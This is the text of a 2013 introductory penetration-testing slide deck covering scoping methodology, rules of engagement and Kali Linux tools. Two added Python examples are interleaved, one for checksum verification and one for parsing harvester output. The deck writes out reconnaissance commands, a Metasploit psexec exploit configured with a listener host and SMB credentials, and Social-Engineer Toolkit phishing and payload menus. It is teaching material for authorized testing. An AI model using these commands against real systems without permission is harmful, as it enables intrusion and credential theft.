
Page 1: Introduction to Penetration Testing (rcfg.org/.../uploads/2013/08/GMU-2013-Intro-to-Pentesting-np.pdf)

© 2013 Wilkinson Technology Services

Wilkinson Technology

Introduction to Penetration Testing

Paul D. Robertson
[email protected]

@compuwar

Page 2

Speaker Bio

Paul D. Robertson

Chief Technology Officer and Chief Information Security Officer
Wilkinson Technology Services
www.wilkitech.com

Page 3

Penetration Testing - Definition

NIST SP 800-115 - Technical Guide to Information Security Testing and Assessment

Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.

Page 4

Caveats

Know the legality of what you’re doing before you do it.
Get permission.
Just being able to run canned tools isn’t usually enough.
Worry about 3rd parties.
Always test your tools in a controlled environment.
Insurance is a good thing.
Evolve.

Page 5

OSSTMM

Open Source Security Testing Methodology Manual

One of many methodologies - none of them canonical.
Good place to find all the “boring stuff” and “confusing terms.”

Page 6

Defining A Security Test

1. Define what you want to protect. These are the assets. The protection mechanisms for these assets are the Controls you will test to identify Limitations.

2. Identify the area around the assets which includes the protection mechanisms and the processes or services built around the assets. This is where interaction with assets will take place. This is your engagement zone.

Page 7

Defining A Security Test

3. Define everything outside the engagement zone that you need to keep your assets operational. This may include things you may not be able to directly influence like electricity, food, water, air, stable ground, information, legislation, regulations and things you may be able to work with like dryness, warmth, coolness, clarity, contractors, colleagues, branding, partnerships, and so on. Also count that which keeps the infrastructure operational like processes, protocols, and continued resources. This is your test scope.

Page 8

Defining A Security Test (Cont.)

4. Define how your scope interacts within itself and with the outside. Logically compartmentalize the assets within the scope through the direction of interactions such as inside to outside, outside to inside, inside to inside, department A to department B, etc. These are your vectors. Each vector should ideally be a separate test to keep each compartmentalized test duration short before too much change can occur within the environment.

Page 9

Defining A Security Test (Cont.)

5. Identify what equipment will be needed for each test. Inside each vector, interactions may occur on various levels. These levels may be classified in many ways, however here they have been classified by function as five channels. The channels are Human, Physical, Wireless, Telecommunications, and Data Networks. Each channel must be separately tested for each vector.

Page 10

Defining A Security Test (Cont.)

6. Determine what information you want to learn from the test. Will you be testing interactions with the assets or also the response from active security measures? The test type must be individually defined for each test, however there are six common types identified here as Blind, Double Blind, Gray Box, Double Gray Box, Tandem, and Reversal.

Page 11

Defining A Security Test (Cont.)

7. Assure the security test you have defined is in compliance to the Rules of Engagement, a guideline to assure the process for a proper security test without creating misunderstandings, misconceptions, or false expectations.

Page 12

Scope

The scope is the total possible operating security environment for any interaction with any asset which may include the physical components of security measures as well. The scope is comprised of three classes of which there are five channels: Telecommunications and Data Networks security Channels of the COMSEC class, Physical and Human Security Channels of the PHYSSEC class, and the full spectrum Wireless Security Channel of the SPECSEC class.

Page 13

Scope

Classes are used to define an area of study, investigation, or operation. However, Channels are the specific means of interacting with assets. An asset can be anything that has value to the owner. Assets can be physical property like gold, people, blueprints, laptops, the typical 900 MHz frequency phone signal, and money; or intellectual property such as personnel data, a relationship, a brand, business processes, passwords, and something which is said over the 900 MHz phone signal.

Page 14

Scope (Cont.)

It must be made clear that a security analysis must be restricted to that which is within a type of certainty (not to be confused with risk, which is not a certainty but a probability). These restrictions include:
1. Non-events such as a volcano eruption where no volcano exists
2. Non-impact like moonlight through a data center window
3. Global-impacting such as a catastrophic meteor impact.

While a thorough security audit requires testing all five channels, realistically, tests are conducted and categorized by the required expertise of the Analyst and the required equipment for the audit.

Page 15

Scope (Cont.)

Classes:

Physical Security (PHYSSEC)
Spectrum Security (SPECSEC)
Communications Security (COMSEC)

Page 16

Scope (Cont.)

Physical Security Channels

Human: Comprises the human element of communication where interaction is either physical or psychological.

Physical: Physical security testing where the channel is both physical and non-electronic in nature. Comprises the tangible element of security where interaction requires physical effort or an energy transmitter to manipulate.

Page 17

Scope (Cont.)

Spectrum Security Channel

Wireless: Comprises all electronic communications, signals, and emanations which take place over the known EM spectrum. This includes ELSEC as electronic communications, SIGSEC as signals, and EMSEC which are emanations untethered by cables.

Page 18

Common Test Types

Blind: No prior target knowledge.
Double Blind: No prior target knowledge and no target notification.
Gray Box: Limited target knowledge.
Double Gray Box: Limited target knowledge; target knows timeframe of test.
Tandem: Full information on both sides.
Reversal: Full information for attacker, no information for defenders.

Page 19

Rules of Engagement

What’s in scope?
What’s allowed?
NDAs, contracts, get out of jail free cards…
Required reporting elements.
Reporting channels.

Page 20

Testing

Passive information collection
Active information collection
Actively test assets

Page 21

Tools

Toolbox
Test Environment

Page 22

Test Environment

MSDN/Technet
Virtual/Physical
Test software revisions!
Keep old versions!

Page 23

Toolbox

Kali Linux is the main tool we’ll be discussing

Replacement for Backtrack Linux
Designed for pentesting
Debian-based

Page 24

Kali Linux

Lives at http://www.kali.org

Actual repository at http.kali.org

Page 25

Kali Linux

Check your checksum after downloading!
Linux: sha1sum
OSX: shasum
Validate the SHA1 file with GPG - it’s in the docs - next slide…

Can run “live” from DVD or USB, or install in a VM or on hardware
Can add persistence to USB installs
Dual boot isn’t always trivial, neither is EFI boot
If you run in a VM, you need a USB-based wireless adapter to attack wireless networks. Kernels are already patched for wireless injection
ARM versions available
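The checksum check the slide asks for, written out as an added example (not code from the slides or from the Kali project): it parses a SHA1SUMS-style file, hashes the image in chunks, compares in constant time, and delegates the "validate with GPG" step to the gpg binary. The file names kali-linux.iso, SHA1SUMS and SHA1SUMS.gpg are assumptions, and demo() hashes a throw-away file rather than a real download.

```python
import hashlib
import hmac
import re
import subprocess
import tempfile
from pathlib import Path
from typing import Dict, Tuple

# One entry per line: "<40 hex chars>  <filename>" (an optional "*" before the
# name marks binary mode, as GNU sha1sum writes it).
SUM_LINE = re.compile(r"^([0-9a-fA-F]{40})\s+\*?(\S+)\s*$")


def parse_sha1sums(text: str) -> Dict[str, str]:
    """Map file name -> expected SHA-1 (lower-case hex) from a SHA1SUMS-style file."""
    expected = {}
    for line in text.splitlines():
        m = SUM_LINE.match(line.strip())
        if m:
            expected[m.group(2)] = m.group(1).lower()
    return expected


def sha1_of_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a (possibly multi-GB) image without loading it all into memory."""
    h = hashlib.sha1()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(iso_path: Path, sums_text: str) -> bool:
    """True only if the image's SHA-1 matches the entry listed for its file name."""
    want = parse_sha1sums(sums_text).get(iso_path.name)
    if want is None:
        raise KeyError(f"{iso_path.name} is not listed in the checksum file")
    # compare_digest avoids an early-exit comparison; the digest is the trust anchor.
    return hmac.compare_digest(sha1_of_file(iso_path), want)


def verify_sums_signature(sums_path: Path, sig_path: Path) -> bool:
    """The 'validate the SHA1 file with GPG' step: shell out to gpg --verify.

    Assumes the distribution's signing key is already in the local keyring;
    otherwise gpg exits non-zero and this returns False."""
    proc = subprocess.run(["gpg", "--verify", str(sig_path), str(sums_path)],
                          capture_output=True)
    return proc.returncode == 0


def demo() -> Tuple[bool, bool]:
    """Constructed end-to-end run on a throw-away file standing in for the ISO.

    Its content b"abc" has the well-known SHA-1 a9993e36...; the second check
    overwrites one byte to show a corrupted or tampered download being rejected."""
    with tempfile.TemporaryDirectory() as tmp:
        iso = Path(tmp) / "kali-linux.iso"  # placeholder name, not a real release
        iso.write_bytes(b"abc")
        sums = "a9993e364706816aba3e25717850c26c9cd0d89d  kali-linux.iso\n"
        intact = verify_download(iso, sums)
        iso.write_bytes(b"abd")
        tampered = verify_download(iso, sums)
    return intact, tampered


if __name__ == "__main__":
    print(demo())  # (True, False)
```

On a real download, run verify_sums_signature(Path("SHA1SUMS"), Path("SHA1SUMS.gpg")) first, since an unsigned checksum file proves nothing about who published it, and only then verify_download.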

Page 26

Kali Linux

RTFM!
http://docs.kali.org
http://docs.kali.org/pdf/kali-book-en.pdf
http://forums.kali.org
irc.freenode.net #kali-linux

Page 27

Kali Linux

Caveats:

Not really designed for complete newbies
Updates routinely break things - snapshot VMs
Use pass-through, not NAT, for VMs
There are more than 300 tools in the distribution - you won’t always find information for them all
You will be running as root all the time.

Page 28

Kali Linux

Relatively easy to build your own custom version
Unlike Backtrack, everything is filesystem standard - no more of that /pentest stuff!
Command help is sometimes off a bit - just use the command directly, it’s in the path.

Page 29

Kali Linux

Relatively easy to build your own custom version from within.
Unlike Backtrack, everything is filesystem standard - no more of that /pentest stuff!
Command help is sometimes off a bit - just use the command directly, it’s in the path.

Page 30

Kali Linux

Good Targets:

https://www.pentesterlab.com/

http://vulnhub.com/

Page 31

theharvester

Applications->Kali Linux->Information Gathering->OSINT Analysis

Example is wrong - no need for ./ or .py

theharvester -d targetdomain -b google -l 500
theharvester -d targetdomain -b linkedin

Using -b all will sometimes give strange results

Can redirect to a file

Page 32

theharvester

theharvester -d mydomain.foo -b all

[+] Emails found:
(e-mail addresses redacted)

Page 33

theharvester

theharvester -d mydomain.foo -b all

[+] Hosts found in search engines:
---------------------------------------------
127.0.0.110:www.mydomain.foo
127.0.0.110:dns1.mydomain.foo
127.0.0.22:dns2.mydomain.foo
127.10.0.110:www.mydomain.foo
[+] Virtual hosts
----------------------
127.0.0.110 otherdomain.bar
127.0.0.110 yetanother.baz
127.0.0.110 otherdomain.baz
127.0.0.110 www.mydomain.foo
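The slide mentions that output can be redirected to a file; this added example (not code from the slides or from theharvester) parses a saved report in the layout shown above, groups every name the search engines tie to each address, and lists names missing from the owner's own inventory, which is how a defender turns this output into an exposure review. The sample report and the inventory are constructed, with placeholder domains and loopback addresses.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed sample in the layout the slide shows: placeholder domains and
# 127.x loopback addresses, not real hosts.
SAMPLE_OUTPUT = """\
[+] Hosts found in search engines:
---------------------------------------------
127.0.0.110:www.mydomain.foo
127.0.0.110:dns1.mydomain.foo
127.0.0.22:dns2.mydomain.foo
127.10.0.110:www.mydomain.foo
[+] Virtual hosts
----------------------
127.0.0.110 otherdomain.bar
127.0.0.110 yetanother.baz
127.0.0.110 otherdomain.baz
127.0.0.110 www.mydomain.foo
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# "ip:hostname" in the search-engine section, "ip hostname" in the vhost section.
HOST_LINE = re.compile(rf"^{IPV4}[:\s]+(\S+)$")

Sections = Dict[str, List[Tuple[str, str]]]


def parse_harvester_hosts(text: str) -> Sections:
    """Split the report into its "[+] ..." sections, each a list of (ip, hostname)."""
    sections: Sections = defaultdict(list)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[+]"):
            current = line[3:].strip().rstrip(":").lower()
            continue
        if not line or set(line) == {"-"} or current is None:
            continue  # blank line, separator rule, or text before the first header
        m = HOST_LINE.match(line)
        if m:
            sections[current].append((m.group(1), m.group(2).lower()))
    return dict(sections)


def names_by_ip(sections: Sections) -> Dict[str, Set[str]]:
    """Every name the search engines tie to each address, across all sections."""
    out: Dict[str, Set[str]] = defaultdict(set)
    for entries in sections.values():
        for ip, name in entries:
            out[ip].add(name)
    return dict(out)


def unexpected_exposure(sections: Sections, authorized: Set[str]) -> Set[str]:
    """Names present in the report but absent from the owner's inventory."""
    found = {name for entries in sections.values() for _, name in entries}
    return found - {n.lower() for n in authorized}


if __name__ == "__main__":
    parsed = parse_harvester_hosts(SAMPLE_OUTPUT)
    for ip, names in sorted(names_by_ip(parsed).items()):
        print(ip, sorted(names))
    inventory = {"www.mydomain.foo", "dns1.mydomain.foo", "dns2.mydomain.foo"}
    print("not in inventory:", sorted(unexpected_exposure(parsed, inventory)))
```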

Page 34

theharvester

I have found that theharvester finds things in Google that the metasploit auxiliary/gather/search_email_collector

Page 35

DNS

dnsrecon -d mydomain
dnsenum mydomain

All allow usage of a wordlist to enumerate potential hostnames.
Wordlists live in /usr/share/wordlist
rockyou is gzipped

Can also use metasploit

Page 36

DNS

In metasploit:
use auxiliary/gather/enum_dns
set DOMAIN mydomain
set ENUM_BRT true
set WORDLIST /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt
set ENUM_AXFR false

Page 37

OpenVAS

Good (not great) vulnerability scanner
Forked from Nessus before everything went commercial
Run the setup first to set up the admin password and start the engines
GSD is difficult to navigate - use GSA if you can
Use domain credentials if you can and filter for high and medium vulns
Use openvas-nvt-sync before starting up each time

Page 38

SET

se-toolkit

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

Page 39

SET

se-toolkit

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

Page 40

Fern Wi-Fi Cracker

GUI tool
WPA, WPA2 and WEP
Wordlists supported

Page 41

Metasploit

service postgresql start
service metasploit start
msfconsole

Page 42

Metasploit

use exploit/windows/smb/psexec
set LHOST 10.0.0.1
set RHOST 10.0.0.127
set SMBUser victim
set SMBPass password
exploit

Page 43

Metasploit

Page 44

Metasploit

Page 45

Teensy 3.0

Page 46

Teensy 3.0

$20.00
Can act as a USB HID
Add Teensyduino code to Arduino to load sketches
Commonly plays as an Apple USB keyboard, which is welcomed by Win*, OSX and most GUI Linuxes

Page 47

Kautilya

http://code.google.com/kautilya

Contains many Teensy payloads

Page 48

Demo Time

Assuming everything works…

Page 49

Wilkinson Technology

[email protected]